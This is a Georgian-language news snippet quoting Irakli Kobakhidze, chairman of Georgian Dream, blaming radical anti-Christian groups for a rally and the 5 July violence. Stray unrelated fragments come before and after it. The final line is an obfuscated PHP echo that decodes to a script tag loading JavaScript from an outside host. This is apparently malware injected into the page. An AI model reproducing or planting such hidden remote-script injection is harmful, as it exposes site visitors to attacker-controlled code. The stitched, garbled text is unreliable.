celsiusi
ავერსი შნაიდერი
„ქართული ოცნების“ თავმჯდომარე ირაკლი კობახიძის განცხადებით, გუშინდელი მიტინგის ორგანიზატორები არიან რადიკალური, ანტიქრისტიანული დაჯგუფებების ლიდერები.
 
,,ამ დაჯგუფებაში შედის რამდენიმე პირი, ასევე „სირცხვილია“ და ის პოლიტიკური ძალები, რომელთა კოორდინაციითაც მოქმედებენ. მათი მიზანია დაუპირისპირდნენ სახელმწიფოს, ეკლესიას, მათ აქვთ ამორალური და ანტისახელმწიფოებრივი მიზნები. ჩვენ არამხოლოდ დავგმეთ 5 ივლისს განხორციელებული ძალადობა, არამედ დაკავებულია არაერთი პირი. გვახსოვს ჟურნალისტებზე მასობრივი ძალადობის შემთხვევები წინა ხელისუფლების პერიოდში, მაგრამ რაც შეიცვალა ხელისუფლება, არც ერთი ფაქტი არ ყოფილა ჟურნალისტებზე ძალადობის. აბსოლუტურად არ იყო გათვლილი ის, რაც მოხდა. როდესაც 6 ივლისს იყო პროგნოზირებადი ძალადობა, ასეთ დროს პოლიციამ მარტივად მოახდინა ძალადობის პრევენცია, თუმცა 5 ივლისს ეს იყო შეუძლებელი. როდესაც ხდება ადამიანის გარდაცვალებაზე პოლიტიკური ქულების დაწერის მცდელობა, ეს არის ამორალური, ამას სხვა ვერაფერს ვერ დავარქმევ“, - აღნიშნა ირაკლი კობახიძემ.
1447
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");